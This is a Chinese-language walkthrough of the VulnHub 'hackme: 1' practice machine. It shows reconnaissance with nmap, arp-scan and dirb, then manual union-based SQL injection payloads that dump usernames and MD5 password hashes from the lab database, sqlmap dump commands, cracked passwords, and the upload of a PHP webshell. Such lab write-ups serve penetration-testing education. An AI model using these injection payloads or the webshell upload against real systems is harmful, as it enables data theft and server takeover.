一.靶场介绍
- 靶机下载地址:hackme: 1 ~ VulnHubhttps://www.vulnhub.com/entry/hackme-1,330/
- 将靶机下载并导入到VMware虚拟机当中,开启hackme1靶场,并开启kali当作攻击机
- 将两台虚拟机均设为桥接模式
二.靶机渗透
1.主机发现 查看同一网段的所有IP,寻找靶机的IP地址,发现靶机IP为192.168.182.181
查看靶机ip
方法一:
a.将kali和靶机都设置为nat模式,查看网段(我的是192.168.182.0)
b.这里要先查看靶机的mac地址
c.用nmap扫描在kali里输入nmap -sV 192.168.182.0/24,扫描靶机,查看ip
方法二:
在kali使用命令 arp-scan -l
2.对靶机进行端口扫描,发现开放80和22端口
nmap 192.168.182.181
3.通过dirb http://192.168.182.181命令查看80端口的详细目录,发现目录为upload
三.渗透流程
SQL注入
手工注入
1.登录主页发现登陆页面,并且可以注册用户
2.点击 Sign up now 注册用户zxczxc 密码zxczxc
3.登录zxczxc用户,点击search可以查看全部
4.验证sql注入 Windows OS' and 1=1# (这边输入的内容只要是这十五个数据中的其中一个就可以了)然后就是
Windows OS' and 1=2#
5.判断字段数 Windows OS' order by 3# 页面回显正常,说明字段数是3
6.查看回显位置 -1' union select 1,2,3#
7.查看库名 -1' union select database(),user(),3#
8.查看表名 -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#
9.查看字段名 -1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#
10.查看表中user,password字段数据 -1' union select group_concat(user),group_concat(pasword),3 from users#
11.将密码进行MD5解密
以此类推,将所有密码解密
user1, 5d41402abc4b2a76b9719d911017c592 hello user2, 6269c4f71a55b24bad0f0267d9be5508 commando user3, 0f359740bd1cda994f8b55330c86d845 p@ssw0rd test, 05a671c66aefea124cc08b76ea6d30bb testtest superadmin, 2386acb2cf356944177746fc92523983 Uncrackable test1, 05a671c66aefea124cc08b76ea6d30bb testtest zxczxc ecb97ffafc1798cd2f67fcbc37226761 zxczxc
工具注入
将请求包中内容复制到与工具同目录下的txt文件中
库名:python3 sqlmap.py -r 1.txt --dbs --batch
表以及数据:python3 sqlmap.py -r 1.txt -D webapphacking --dump --batch
四.文件上传
1.使用superadmin用户登录 密码:Uncrackable 发现文件上传点
2.上传phpinfo()进行验证
先试试直接上传php文件
发现可以直接解析
该上传点存在文件上传漏洞
3.尝试上传一句话木马
页面空白,说明木马上传成功